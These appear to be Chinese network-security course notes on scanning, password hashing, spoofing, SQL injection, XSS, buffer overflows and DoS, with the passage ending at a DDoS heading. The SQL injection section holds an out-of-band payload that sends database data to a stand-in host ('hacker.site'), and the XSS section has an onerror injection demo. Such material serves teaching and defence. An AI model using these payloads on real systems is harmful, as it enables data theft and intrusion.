0x01 网络安全概论

网络不安全的原因:自身缺陷 + 开放性 + 黑客攻击。

网络安全的威胁来源

CIA 三元组与网络安全基本需求

机密性、完整性、可用性三者相互依存,形成一个不可分割的整体,三者中任何一个的损害都将影响到整个安全系统。

  • Confidentiality 机密性

机密性是防止未授权的用户访问数据,简单来说就是不能看

为了维护机密性,通常会在数据的处理、传输、储存过程中进行一些诸如加密或者权限类的保护措施来进行安全控制。

针对机密性的破坏主要包括窃取密码文件、社会工程学、嗅探、肩窥等。

  • Integrity 完整性

完整性是防止未授权的修改数据,也就是不能改

针对完整性的破坏主要有病毒、应用程序错误、逻辑炸弹,以及被授权用户的非授权操作。

所以,为了保护完整性,要进行严格的访问控制,严格的身份认证以及严密的人员培训。

完整性依赖于机密性,如果没有机密性,也就无法维护完整性。

  • Availability 可用性

可用性是保证经过授权的客户能及时准确的不间断的访问数据,也就是一直用

针对破坏可用性的威胁主要有设备故障、软件错误、包括一些不可抗力如洪水、火灾等。再企业中,造成可用性破坏的最主要原因是人为错误,疏忽或失职造成的如意外删除文件、私自分配资源、安全策略配置错误等。

可用性依赖于完整性和机密性。

* 网络安全基本需求:机密性、完整性、可用性、可控性、不可抵赖性。

  • 可控性

可控性是人们对信息的传播路径、范围及其内容所具有的控制能力,即不允许不良内容通过公共网络进行传输,使信息在合法用户的有效掌控之中。

  • 不可抵赖性

不可抵赖性也称不可否认性。在信息交换过程中,确信参与方的真实同一性,即所有参与者都不能否认和抵赖曾经完成的操作和承诺。简单地说,就是发送信息方不能否认发送过信息,信息的接收方不能否认接收过信息。利用信息源证据可以防止发信方否认已发送过信息,利用接收证据可以防止接收方事后否认已经接收到信息。数据签名技术是解决不可否认性的重要手段之一。

网络攻击类型

从安全属性上分类:阻断攻击、截取攻击、篡改攻击、伪造攻击、重放攻击。

从攻击方式上分类:主动攻击、被动攻击。

OSI 安全体系

5 类安全服务:机密性、完整性、不可否认性、访问控制、认证

8 种安全机制:加密、数字签名、访问控制、信息完整性、鉴别交换、业务量填充、路由控制、公证

等级保护制度

  • 第一级别:用户自主保护级。

  • 第二级别:系统审计保护级。

  • 第三级别:安全标记保护级。

  • 第四级别: 结构化保护级。

  • 第五等级:访问验证保护级。

0x02 黑客攻击流程 & 渗透测试

黑客攻击流程

  • 破坏型
1
踩点 -> 扫描 -> 查点 -> 获取访问权 -> 拒绝服务
  • 入侵型
1
踩点 -> 扫描 -> 查点 -> 获取访问权 -> 提权 -> 窃取信息 -> 掩踪灭迹 -> 创建后门

踩点

踩点(footprinting): 信息收集过程(开源情报,Open Source Intelligence,OSINT)—— 被动侦查阶段,在一个区域内寻找有用信息,从公开渠道查出目标使用的域名网络地址块IP地址以及与信息安防现状有关的其他细节等。

踩点的途径:公开渠道获取信息、Whois 查询、DNS 查询、网络侦查。

* Google Hacking - 搜索引擎技巧:

  • 与:空格AND;或:OR ;非:-

  • site、inurl、allinurl、intitle、allintitle;

  • link(所有链接到某个 URL 地址的网页);

  • related (相似页面)、cache(快照)、info(相关信息)。

* 扫描:确定目标系统是否真实存在、确定目标系统上哪些服务正在运行或监听、探查操作系统。

* 查点:对是被出来的服务进行充分探查,寻找用户账户名、错误配置的共享资源、具有已知安全性漏洞的旧版本软件等。

* 攻击:破坏性攻击主要使用工具发起攻击、入侵性攻击则利用收集到的信息,找出其系统漏洞,然后利用漏洞获取尽可能高的权限。

* 隐藏踪迹:最简单的就是删除日志文件,更常用的办法是只对日志中有关自己的部分做修改,更高级的办法如替换系统程序(替换正常程序的程序称之为 rookit)。

渗透测试步骤

渗透测试(Pentration Testing):一种通过模拟攻击者的技术与方法,挫败目标系统的安全控制措施并获取访问控制权的安全测试方法。

渗透测试执行标准(PTES: Pentration Testing Execution Standard):

  1. 前期交互阶段(Pre-Engagement Interaction)

    确定渗透测试范围、目标、限制条件与服务合同细节。

  2. 情报收集阶段(Information Gathering)

    获取目标网络拓扑、系统配置、安全防御措施等信息。

  3. 威胁建模阶段(Threat Modeling)

    针对获取的信息进行威胁建模与攻击规划。

  4. 漏洞分析阶段(Vulnerability Analysis)

    综合分析汇总的情报信息,从漏扫结果、服务查点信息等,找出可实施攻击的点。

  5. 渗透攻击阶段(Exploitation)

    利用找出的系统漏洞入侵系统,获取访问控制权限。

  6. 后渗透阶段(Post Exploitation)

    根据目标组织业务经营模式、保护资产形式等自主设计攻击目标,寻找客户组织最具价值和尝试安全保护的信息和资产,最终实施能造成重要业务影响的攻击。

  7. 报告阶段(Reporting)

    凝聚所有阶段获取到的关键情报信息、探测和发掘出的系统安全漏洞、成功的渗透过程,同时站在防御者角度上分析安全体系中最薄弱的环节及修补与升级技术方案。

* 常用的命令与工具:

1
ping, nslookup, host, hostnew, traceroute(tracert), nmap, telnet, net, dig, whois

0x03 网络扫描与查点技术

扫描的基本步骤

1
确定目标系统是否真实存在 -> 确定目标系统上哪些服务正在运行或监听 -> 探查操作系统

端口扫描的类型

  1. TCP 连接扫描(TCP Connect):nmap -sT

    连接目标端口并完成一次完整的三次握手过程,很容易被目标系统察觉。

  2. TCP SYN 扫描(半开扫描):nmap -sS

    向目标端口发送 SYN 数据包,返回 SYN/ACK 数据包则可断定该端口出于监听状态,返回 RST/ACK 数据包则表明该端口不在监听状态,然后发送 RST/ACK 数据包(使通信双方不会建立一条完整连接)。
    优点:更隐蔽,目标系统一般不会将其记入日志。
    缺点:半开连接过多时,会形成一种“拒绝服务”条件而引起对方的警觉。

  3. TCP FIN 扫描(秘密扫描):nmap -sF

    向目标端口发送 FIN 数据包,如果目标端口关闭,目标系统返回 RST 数据包,否则丢弃该包。通常只对 Unix 系统的 TCP/IP 栈有效,Windows 平台下总是返回 RST 包。
    优点:FIN 数据包能通过监测 SYN 包的包过滤器,由于不包含 TCP 三次握手协议的任何部分,所以无法被记录下来,比 SYN 扫描更加隐蔽。

    * 两个变种:

    • TCP Xmas 扫描(圣诞树扫描):nmap -sX

      TCP 包包头设置所有标志位,目标端口关闭则返回 RST 数据包。

    • TCP Null 扫描(空扫描):namp -sN

      关闭掉所有的标志,目标系统关闭则返回 RST 数据包。

  1. TCP ACK 扫描:nmap -sA

    测试防火墙的规则集。判断防火墙是简单的包过滤防火墙,还是高级的、具备数据包过滤功能的状态(Stateful)防火墙,不能用来确定端口的开放状态。

  2. TCP 窗口扫描:nmap -sW

    测试特定目标系统(如 AIX 和 FreeBSD 系统)上的端口是否开放、被过滤,会导致目标系统返回不同的 TCP 窗口长度值。

  3. TCP Maimon 扫描:nmap -sM

    探测报文改为 FIN/ACK 外,其原理与 TCP FIN 扫描一样,无论端口是否开放,都响应 RST 报文,如果端口开放,许多 BSD 的系统只是丢弃该报文。

  4. UDP 扫描:nmap -sU

    向目标端口发送 UDP 数据包,如返回 ICMP port unreachable 出错消息,表明端口关闭,如果没有收到该消息,端口可能开放。

    remark:UDP 不要求必须建立一条连接,所以扫描的准确性取决于与目标网络的使用情况和过滤机制有关的许多因素,扫描结果不可靠。

扫描的防御

  • 在某个不常用的端口进行监听,如发现对该端口的连接请求,就认为有端口扫描。一般这些工具都会对连接请求的来源进行反探测,同时弹出提示窗口。

  • 混杂模式下抓包(Wireshark)并进一步分析判断。

  • 蜜罐系统(Honeypot),本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。

  • 审计技术(Auditing),使用系统记录下的使用时间、敏感操作和违纪操作等,为系统进行事故原因查询、事故发生后的实时处理提供详细可靠的依据或支持。

0x04 口令破解与防御

常用的口令破解方法

  • 暴力破解(Brute force):穷举,速度慢。

  • 字典攻击:根据用户信息建议起一个用户可能使用的口令列表文件,速度快。

  • 组合攻击:在字典的基础上增加几个字母或数字进行攻击。

  • 社会工程学(Social engineering)

  • 偷窥、网络嗅探、木马、口令蠕虫、搜索垃圾箱、重放等。

Windows 口令安全

Security Account Manager

安全机制:安全账户管理器 SAM (Security Account Manager) 机制。

SAM 文件包含本地系统或所在控制域上所有用户名口令的 Hash 值。SAM 文件路径:

1
%systemroot%system32\config

创建口令 Hash 有两种办法:

  • LAN Manager(LM)——— 最早使用的密码 Hash 算法之一;

  • NT LAN Manager v2(NTLMv2)——— Windows 2000、xp、Vista、7 等;

* remark: 新 OS 支持使用 LM 哈希,主要是提供向后兼容性,在 Windows Vista/7/8… 中默认被禁用。

LAN Manager

Windows 下的 Hash 密码格式:

1
用户名:RID:LM-Hash值:NT-Hash值

*安全标示 RID:在账户创建时被创建;账户删除时删除,即使用户名相同,每次创建时获得的 RID 也不相同。

* LM 哈希步骤:

  1. 将用户的口令全转化为大写字母, 添加空字符(null),直至口令长度等于 14-byte 字符;

  2. 将新获得的口令拆分成两组 7-byte 的对分;

  3. 分别经 str_to_key() 函数处理创建两个 7-byte DES 加密密钥,并为每一组添加奇偶校验位,即可创建出 64-bit 的密钥;

  4. 使用每个 DES 密钥加密一个预定义的魔术字符串(KGS!@#$%),获得两个 8-byte 密文值;

  5. 密文值链接组成 16 字节的值,即最终获得的 LM 哈希值。

* LM Hash 缺陷:

  1. DES 算法密钥太短 (56bit);

  2. 14-byte ASCII(95^14) -> 2 * 7-byte (95^7),不区分大小写 -> 69 ^ 7,在暴力破解面前不堪一击;

  3. 口令长度 < 7 时,第二部分的 Hash 为固定值,容易确定密码的长度范围;

  4. Hash 值在通过网络发送到服务器时,没有进行 salting 操作,容易受 中间人攻击重放攻击

* 中间人攻击 MITM(Man-in-the-middle attack)在密码学和计算机安全领域中是指攻击者与通讯的两端分别建立独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全控制。

NT LAN Manager v2

NTLMv2 从 Windows NT 4 开始备用作全新的身份验证方法:

登录与身份认证

一、登录

  1. 交互式认证

    本地计算机域(Domain)账户确定用户的身份。

    • 本地计算机

      可使用存储在本地的 SAM 中的口令散列值进行登录。

    • 域账户登录

      默认使用 Kerberos V5。

  2. 网络登录

    对用户尝试访问的网络服务或资源提供用户验证。

二、身份认证

  1. LM & NTLMv1

  2. NTLM 身份认证机制

    在登录前,客户端会缓存输入口令的 Hash 值,明文口令丢弃。

  3. NTLMv2 身份认证过程

Linux 口令安全

/etc/passwd:包含了用户名、用户名的真实姓名、标识信息以及每个用户的基本信息,各个域之间用 : 分隔,加密密码位置一般单独放在 Shadow 文件中。

过去 Unix 通过一个单向函数 crypt() 对密码进行加密并保存该加密值。crypt() 函数基于 DES 算法,使用用户口令作为 DES 加密密钥(用户口令的前 8-byte 字符,每个字符各取最低 7-bit,共 56-bit),加密一个全零的 64 位块,然后再对密文结果进行加密,共加密 25 次,最后的 64-bit 密文被划分为 11-byte 可打印字符,并保存起来。每个字符表示 6 位,然后可顺序表示成 a-zA-Z0-9./ 等 64 个字符。

现在 Unix Salt:Morris 和 Thompson 对 DES 算法进行了修改,增加了 salt 位(2 个字符的字符串 a-zA-Z0-9./,每个字符表示 6 位,共 4096 种可能。当用户改变口令时,系统根据日期选取一个 salt 值,然后将该 salt 值转化为 2-byte 字符串,并连同加密后的口令一起保存起来。

相同的口令 + 不同的 salt 值 = 不同的加密后的口令

* crypt16(): 为提高 crypt() 函数的安全性,Unix 系统改变了 crypt() 函数的加密算法,使用如 Blowfish、MD5 等算法。

/etc/shadow:影子密码文件,包含了加密过的密码以及密码失效的时间,该文件被保护起来,只有 root 用户才能读取。

* Linux 常用命令

1
chmod, ls, ps, passwd, su, sudo, su- 等

susu -: su 不会更换当前目录等信息,su - 默认切换到 root 用户主目录,su -c command 以 root 权限执行一条命令后即终止 root 权限。

口令破解的防御

  1. 提高口令的强度,加大攻击者破解的时间和难度。

  2. 阻止攻击者反复尝试的可能。

0x05 欺骗技术与防御

ARP 欺骗 📌

ARP 欺骗(ARP spoofing),又称 ARP 毒化(ARP poisoning)或 ARP 攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者 PC 的网关 MAC 地址,使访问者 PC 错以为攻击者更改后的 MAC 地址是网关的 MAC,导致网络不通。

* ARP 缺陷:主机收到应答包后,不验证自己是否发送过对应的 ARP 请求,不验证该回应包是否可信直接用应答包里面的信息替换 ARP 缓存表中的原有信息。

* ARP 欺骗的后果

  1. 导致同网段的其他用户无法正常上网(频繁断网或网速慢);

  2. 嗅探交换式局域网内的所有数据包,从而获取敏感信息;

  3. 对信息进行篡改,修改重要信息,进而控制受害者会话。

* ARP 欺骗的检测

  1. 网络频繁掉线,网速莫名其妙的慢;

  2. 使用 arp -a 命令发现网关的的 MAC 地址与真实的网关 MAC 地址不同;

  3. 使用网络嗅探软件发现局域网内存在大量 ARP 响应包。

* ARP 欺骗的防御

  1. MAC 地址绑定,使用静态的 ARP 缓存;

  2. 使用 ARP 服务器,使用 ARP 防火墙;

  3. 及时发现进行 ARP 欺骗的主机,将其进行隔离。

IP 欺骗 📌

IP 协议不是面向连接的,两台计算机的信任连接主要依靠双方的 IP 地址。在计算机网络里面,IP 地址欺骗或 IP 欺骗是指带有假的源 IP 地址的 IP 协议分组(数据报),目的是冒充另一个计算系统身份。使发送方可以保持匿名的一种技术是使用代理服务器。

IP spoofing (IP 欺骗),一种涉及已建立的活动会话被他人截取和加入的攻击。IP 欺骗也是一种攻击方法,该方法使用捏造的源地址来发送 IP 数据包,此类数据包可能会采用可信源的 IP 地址来尝试绕过防火墙。这将使防火墙误以为来自黑客的数据包确实是来自可信源的。IP 欺骗也可以仅用于隐藏攻击的真实来源。

IP 欺骗是入侵者使用其他计算机的 IP 地址来获取信息或访问权限的过程。由于入侵者伪装成他人出现,因此如果发送回复,该回复将发往入侵者所伪造的地址,而非其真实地址。

IP 欺骗的方式

  1. 简单的 IP 地址修改

    攻击者将 IP 地址修改为其他主机的地址,Inernet 为动态路由,攻击者不能得到返回的数据流。

    • TCP: 受害主机收到一无所知的会话回复,将丢弃数据包,无法完成一次完整的 TCP 连接。

    • UDP: 无连接,数据包将发送到受害主机,导致拒绝服务。

  1. 源路由攻击(Source Routing);

    • 宽松的源站选择(LSR):发送端指明数据包必须经过的 IP 地址清单,但如果需要也可以经过其他地址;

    • 严格的源站选择(SRS):发送端指明数据包必须经过的确切 IP 地址,数据包如果没有经过这一确切路径,数据包将被丢弃,并返回 ICMP 报文。

  1. TCP 会话劫持(Session Hijack)。

    接管现存动态会话的过程,即攻击者可以代替原来的合法用户,同时监控并掌握会话内容。会话劫持结合了嗅探和欺骗技术,一般伴随着拒绝服务 DoS,且不依赖操作系统。

    会话劫持过程:

    1. 发现攻击目标:必须能检测目标主机的通信流;
    2. 确认会话状态:会话劫持一般在流量达到高峰时进行
      • 攻击者可选择的会话比较多
      • 掉线不容易引起用户的怀疑
    3. 猜测序列号
      • TCP 仅通过 SEQ/ACK 序列号来区分正确/错误数据包
      • 以某种方式扰乱客户机的 SEQ/ACK,使得服务器不再相信客户机的正确数据包,然后伪装成客户机,使用猜测的正确的 SEQ/ACK 序列号与服务器通信。
        * 扰乱方法:恰当的时间在通讯流中插入一个欺骗包,服务器接收后更新 ACK ,客户机对此毫无察觉,仍然使用 SEQ 通信。
    4. 使客户主机下线: DoS攻击
    5. 接管会话:攻击者在受害服务器上留下后门(创建账户)

IP 欺骗的防御

  1. 防范基本的 IP 欺骗:

    • 入口过滤:不允许任何从外面进入网络的数据包使用单位内部地址作为源地址;
    • 出口过滤:从内网主机到内网主机的流量不允许流到本网络之外。
  2. 防范源路由欺骗

    设置路由器禁用源路由。

  3. 防范会话劫持

    没有有效的方法可以根本上防范会话劫持攻击,只能尽可能减少攻击带来的危害。

    • 加密;
    • 使用安全协议:使用 SSH 而不使用 Telent。
    • 限制保护:允许外网到内网的信息越少,内网越安全。

DNS 欺骗

原理及实现步骤

当本地 DNS 服务器查询域名时,如果服务器缓存中已有响应的记录,就直接将这条记录返回给用户。DNS 欺骗的关键是在 DNS 服务器的本地 Cache 中缓存一条伪造的解析记录。

两种可能情况下的实现办法

  1. 本地域名服务器可控

    直接添加新的解析记录即可。

  2. 无法控制 DNS 服务器

    控制 DNS 服务器所在网络中的某台主机,并可以监听该网络中的通信情况。黑客要对远程的某 DNS 服务器进行欺骗:首先,黑客要冒充某个域名服务器的 IP 地址;其次,黑客要能预测目标域名服务器所发送的 DNS 的 ID 号。DNS 数据通过 UDP (53 端口)协议传递,通信过程往往是并行的,即域名服务器之间同时可能会进行多个解析过程,确定目标 DNS 服务器的 ID 号为 DNS 欺骗攻击的关键,请求方和应答方使用相同的 ID 号证明是同一个会话。

    • 对 DNS 服务器的网络进行嗅探,获取 ID 号;
    • 向目标 DNS 服务器请求某个不存在的域名地址,冒充所请求域的 DNS 服务器,向目标 DNS 服务器连续发送应答包,包中的 ID 号依次增加,一段时间后再次向目标 DNS 服务器发送针对该域名的解析请求,如果得到返回结果,就说明目标 DNS 服务器接受了刚才的伪造应答,否则,再次尝试。

DNS 欺骗的局限性

  • 攻击者不能替换缓存中已存在的记录;

  • DNS 服务器存在缓存刷新时间问题;

配置 DNS 服务器时注意

  • 使用最新版的 DNS 服务器软件并及时安装补丁;

  • 关闭 DNS 服务器的递归功能,限制区域传输范围,限制动态更新,采用分层的 DNS 体系结构。

电子邮件欺骗与邮件安全(PGP)

原理:

  1. 邮件系统的组成

    • 用户代理(User Agent):用户端发现和收信的程序,负责将信件按照一定标准包装,然后送到邮件服务器或将邮件收回。
    • 传输代理(Transfer Agent):负责信件的交换和传输,将信件传送到适当的邮件服务器。
    • 投递代理(Delivery Agent):将信件分发至最终用户的邮箱。
  2. 正常情况下,邮件会将发送者的姓名和地址包括进邮件头中,但有时发送者不希望收件者知道是谁发的(匿名邮件):

    • 最简单的方法:改变电子邮件的发送者的名字,但通过邮件头的其他信息仍能跟踪到发送者;
    • 彻底的方式:让其他人发送这个邮件,发信地址就变成转发者的地址,借助匿名服务器。

方法:

  1. 利用相似的电子邮件地址;

  2. 直接使用伪造的 E-mail 地址

    SMTP 协议的致命缺陷——遵循过于信任原则:不对邮件发送者的身份进行验证。

  3. 远程登录到 SMTP 端口(25)发送邮件。

攻击模式: 钓鱼(Phishing)邮件、鱼叉网络钓鱼(Spear Phishing)。

防御:

  • 树立风险意识,不要随意打开一个不信任的邮件。

0x06 Web 攻击与防御 📌

SQL 注入

原理

利用 Web 应用对后台数据库查询语句处理存在的安全漏洞,攻击者提交一段精心构造的数据库查询代码,根据返回的结果,获取敏感数据。

受影响的系统:对输入参数不进行检查和过滤的系统。

分类

  1. 根据有无回显

    • 普通注入:根据数据库提示的有价值的信息进行注入

    • 盲注(Blind SQL Injection):没有提供详细错误信息,攻击者需要对表中的每个字段进行猜解。

  2. 根据注入点类型

    • 数字型注入

    • 字符型注入

  3. 其他分类

    • First Order Injection

      • In-band SQLi(攻击者能够使用相同的信道发起攻击并收集信息)
      • Union Select SQLi
      • Error-Based SQLi
      • Blind SQLi
      • Time-based SQLi
      • Out-of-band SQLi
        在 SQL 注入攻击中,攻击者的 Payload 代码成功执行了,但由于各种因素所致,结果无法通过 HTTP Response 来答复攻击者的 HTTP Request,攻击者也就无法从这种“信道”获取 Payload 产生的数据。而 OOB 中,攻击者通过构造特殊的 Payload,让受害主机向指定主机发送 HTTP 请求或 DNS 查询,而这些请求报文中携带了查询结果的数据。
        1
        select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
    • Second Order Injection

    • Others

      • Stacked queries
      • Inline Queries

注入过程

  1. 客户端:参数值等数据被修改

  2. 服务端:未经检查和过滤,将修改的数据注入到 SQL 语句中,SQL 语句功能被修改

  3. 数据库引擎:执行被修改后的 SQL 命令

  4. 服务端:将注入的结果返回给客户端

  5. 客户端:根据上一次注入获取到的敏感信息构造注入语句进行进一步注入

注入防范

  1. 使用预编译语句,绑定变量。

  2. 对用户提交的数据和输入参数进行严格的过滤

  3. 摒弃 SQL 语句,改用存储过程来访问和操作数据。

  4. 使用安全函数:比如 OWASP ESAPI。

  5. 最小权限原则。

跨站脚本攻击 XSS

原理

跨站脚本攻击(Cross Site Script):攻击者向 Web 页面中插入恶意脚本代码,当用户浏览网页时,嵌入其中的代码被执行。

分类

  1. 反射型 XSS (Reflected XSS)

    反射型跨站脚本(Reflected Cross-Site Scripting)是最常见,也是使用最广的一种,可将恶意脚本附加到 URL 地址的参数中。
    反射型 XSS 的利用一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代码的 URL,当受害者点击这些专门设计的链接的时候,恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方,常用来窃取客户端 Cookies 或进行钓鱼欺骗。

  2. 存储型 XSS (Stored XSS)

    持久型跨站脚本(Persistent Cross-Site Scripting)也等同于存储型跨站脚本(Stored Cross-Site Scripting)。
    此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本,攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型 XSS 一般出现在网站留言、评论、博客日志等交互处,恶意脚本存储到客户端或者服务端的数据库中。

  3. DOM 型 XSS (DOM-Based XSS)

    传统的 XSS 漏洞一般出现在服务器端代码中,而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞,所以,受客户端浏览器的脚本代码所影响。客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型,因此能够决定用于加载当前页面的 URL。换句话说,客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容,它不依赖于服务器端的数据,而从客户端获得 DOM 中的数据(如从 URL 中提取数据)并在本地执行。另一方面,浏览器用户可以操纵 DOM 中的一些对象,例如 URL、location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本,而这些脚本没有经过适当的过滤和消毒,那么应用程序就可能受到基于 DOM 的 XSS 攻击。

* 反射型 XSS 与 DOM 型 XSS 的区别

  1. 反射型 XSS,绝⼤多数依托 url 进⾏攻击,原理如下:将恶意参数以 url 的形式,传⼊服务器,服务器再将这个恶意参数插⼊到 Html 标签⾥⾯,并以响应包的形式反馈到浏览器,浏览器解析恶意代码即触发。

  2. ⽽ DOM 型 XSS,主要是 Js 中的 DOM ⽅法,构造恶意标签插⼊到 Html 节点中,浏览器解析即触发。整个过程都是在前端实现的,不涉及服务器

    Demo:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    <html>
    <head>
    <title> DOM Based XSS Demo </title>
    <script>
    function xsstest() {
    var str = document.getElementById("input").value;
    document.getElementById("output").innerHTML = "<img src='"+str+"'></img>";
    }
    </script>
    </head>
    <body>
    <div id="output"></div>
    <input type="text" id="input" size=50 value=""/>
    <input type="button" value="提交" onclick="xsstest()"/>
    </body>
    </html>

    写入恶意 js 代码,如1' onerror='alert(1,会被 DOM 方法以标签的形式插入 output 节点中并执行,整个过程中没有与服务器进行交互,全部都是在前端完成的。

反射型 XSS 与 DOM 型 XSS 的维度不同: 反射型会将参数以 url 形式交给服务器,服务器处理之后,会将参数放⼊ html,并以响应形式显示到前端。 但是 DOM 型整个过程都在前端执⾏,DOM 不关注调⽤参数的来源,是前端输⼊,还是服务器处理之后的, 它只会把 DOM ⽅法接收的参数,以 DOM ⽅法定义的形式插⼊到⽬标节点中,整个过程只在前端执⾏,也就是我们⽹上经常看到的对于客户端的攻击。 所以我们可以把 DOM 型放在反射型类别,也可以放在存储型类别。取决于 DOM ⽅法要处理参数的来源。 来⾃ url 请求,即为反射型;来⾃后台数据库,即为存储型。

攻击过程:

  1. 寻找 XSS 漏洞

  2. 注入恶意代码

  3. 欺骗用户访问

防御手段:

  1. 用户层加强教育。

  2. 开发层对所有用户提交的内容进行可靠的输入验证,保护所有敏感功能,以防被机器人自动执行或者被第三方网站执行(采用 Session token、验证码等)。

其他攻击类型

  • 跨站请求伪造 CSRF

跨站请求伪造(Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的 Web 应用程序上执行非本意的操作的攻击方法。

* 防御手段

  1. 尽量使用 POST,限制 GET.

  2. Cookie 策略(SameSite 头).

  3. 验证码.

  4. Refer Check.

  5. Anti CSRF Token.

0x07 缓冲区溢出攻击与防御

缓冲区溢出原理

缓冲区(Buffer)是包含相同数据类型实例的一个连续的计算机内存块,是程序运行期间在内存中分配的一个连续区域,用于保存包括字符数组在内的各种数据类型。

缓冲区溢出(Buffer Overflow): 向固定长度的缓冲区写入超出其预定长度的内容,造成缓冲区数据溢出,从而覆盖缓冲区周围的内存空间。

攻击者借此精心构造填充数据,导致原有流程改变,转而执行特殊的代码,最终获取控制权。

程序在内存中的存放形式:程序运行时,计算机会在内存区域开辟一段连续的内存块,包括代码段数据段堆栈段三部分。

  1. 代码段(.text)

    文本段(Text Segment),存放程序的机器码和只读数据,一般标记为只读,任何对该区域的写操作都会导致段错误(Segment Fault)。

  2. 数据段
    数据段在编译时分配。

    • 已初始化的数据段(.data):保存全局的和静态的已初始化变量。
    • 资源数据段(.rdata):保存程序中全局可访问的只读数据。
    • 未初始化的数据段(.bss):保存全局的和静态的未初始化变量。
  3. 堆 Heap

    位于 BSS 段上面,存储程序运行时分配的变量。

    • 大小不固定,可动态扩张、缩减。
      由 malloc()、new()等内存分配函数实现,当调用 new() 等函数时,新分配内存被动态添加到堆上(堆扩张);当利用 free(), delete() 等函数释放内存时,内存从堆中剔除(堆缩减)。

    • 堆内存释放由应用程序控制。
      通常一个 new() 要对应一个 delete(),如果程序没有释放,程序结束后操作系统会自动回收。

  4. 栈 Stack

    先进后出(FILO),函数调用时的临时信息结构,如函数调用传递的参数、函数返回地址、函数的局部变量等。

    • 程序运行时由编译器按需分配,不需要时自动清除。
  5. 堆和栈的区别

    1. 分配和管理方式不同

      • 堆:动态分配,空间的分配和释放都是由程序员控制。
      • 栈:由编译器自动管理。
    2. 产生的碎片不同

      • 堆:频繁的 new()/delete() 或 malloc()/free() 势必会造成内存空间的不连续,造成大量碎片,使程序运行效率降低。
      • 栈:先进后出的队列,永远不可能有一个内存块从栈中间弹出。
    3. 生长方向不同

      • 堆:向着内存地址增加的方向增长。
      • 栈:向着内存地址减小的方向增长,由内存的高地址向低地址方向增长。
  6. PE 文件与虚拟内存之间的映射
    * PE 文件(Portable Executable):可移植的可执行的文件。

  7. 几个重要概念

    • 文件偏移地址(File Offset): 数据在 PE 文件中相对文件开头的偏移。

    • 装载基址(Image Base): PE 文件装入虚拟内存的基地址,默认情况下,EXE 文件的基址为0x00400000,DLL 文件的基址为 0x10000000

    • 虚拟内存地址(Virtual Address, VA): PE 文件中的指令被装入(虚拟)内存后的地址。

    • 相对虚拟地址(Relative Virtual Address, RVA): VA 相对基址的偏移量,VA = Image Base + RVA

    • 节偏移:由存储单元差异引起的节基址差。

      文件偏移地址 = RVA - 节偏移 = VA - Image Base - 节偏移

栈溢出 📌

PE 文件代码段中包含的机器码会装入内存的代码段(.text)。发生函数调用时,函数的调用关系等信息会动态保存到内存的栈区。如果需要动态分配内存,则在内存的区分配合适的区域。

在 C 函数中,每个函数都有一个栈帧,它用来保存这个函数的参数、局部变量、返回地址等信息,是系统栈的一部分。

1
void foo(char *arg1, char *arg2) { int temp = 0; char buffer[4]; strcpy(buffer, arg1); }

该函数对应的栈帧如下:

  • ESP(栈指针寄存器, extended stack pointer):存放在系统栈最上面栈帧的栈顶,称为栈顶指针,用来指示当前栈帧的顶部。
  • EBP(基址指针寄存器, extended base pointer):存放系统栈最上面栈帧的栈底,称为栈基址指针,用来指示当前栈帧的底部。

在调用这个函数时,压栈的顺序为:

  1. 调用者压入需要保存的寄存器,通常这些寄存器包括 EAX,ECX 和 EDX等
  2. 按照从右往左的顺序压入参数 arg2 和 arg1
  3. 压入返回地址
  4. 调用者的 EBP
  5. 第一个声明的局部变量 temp
  6. 第二个声明的局部变量 buffer
  7. 被调用者即 foo 本身压入需要保存的寄存器, 通常这些寄存器包括 EBX,ESI 和 EDI 等

由于局部变量 buffer 的长度是 4 个字节,而在使用 strcpy 函数的时候并没有判断参数 arg1 的长度,因此,当传入的 arg1 的长度大于 4 个字节时,多出的字节将会依次覆盖掉局部变量 temp、调用者的 EBP、返回地址等。
通过精心构造 arg1 的值,就可以将返回地址覆盖为任意想要的值,以便于跳到 shellcode(缓冲区溢出攻击中植入进程的代码)。

其他溢出的工作原理

  • 堆溢出

  • BSS溢出

  • 格式化溢出

  • 整数溢出

* 一般攻击过程:

  1. 在程序的地址空间里安排适当的代码(shellcode);

  2. 通过适当的初始化寄存器和存储器,让程序跳转到安排好的地址空间执行。

缓冲区溢出的防御措施

原因:编程语言缺乏类型安全,程序缺少边界检查。

  1. 源码级保护

    避免源码中的相关 BUG,注意检查边界,尽可能使用可替代的安全函数。

  2. 运行期保护

    插入代码进行数组边界检查,引用指针前进行指针完整性检查

  3. 阻止攻击代码执行

    设置缓冲区地址空间(堆栈数据段)为不可执行,使攻击代码不能执行从而避免攻击。

  4. 加强系统防护

    操作系统的内存保护技术。

0x08 拒绝服务攻击

概念

拒绝服务攻击(Denial-of-Service Attack)亦称洪水攻击,是一种网络攻击手法,其目的在于使目标电脑的网络或系统资源耗尽,使服务暂时中断或停止,导致其正常用户无法访问。

分类

  1. 按拒绝对象

    • 带宽消耗型攻击

      • 洪水攻击:UDP、ICMP、Ping Of Death
      • 放大攻击:NTP、DNS
    • 资源消耗型攻击

      • SYN 洪水
      • LAND Attack
      • CC

* DDOS原理与防御 - Mochazz

DDoS 工作原理

分布式拒绝服务攻击(Distributed Denial-of-Service Attack),是使用网络上两个或两个以上被攻陷的电脑作为 僵尸 向特定的目标发动 拒绝服务 式攻击。

防御

  1. 网络层 DDoS 防御

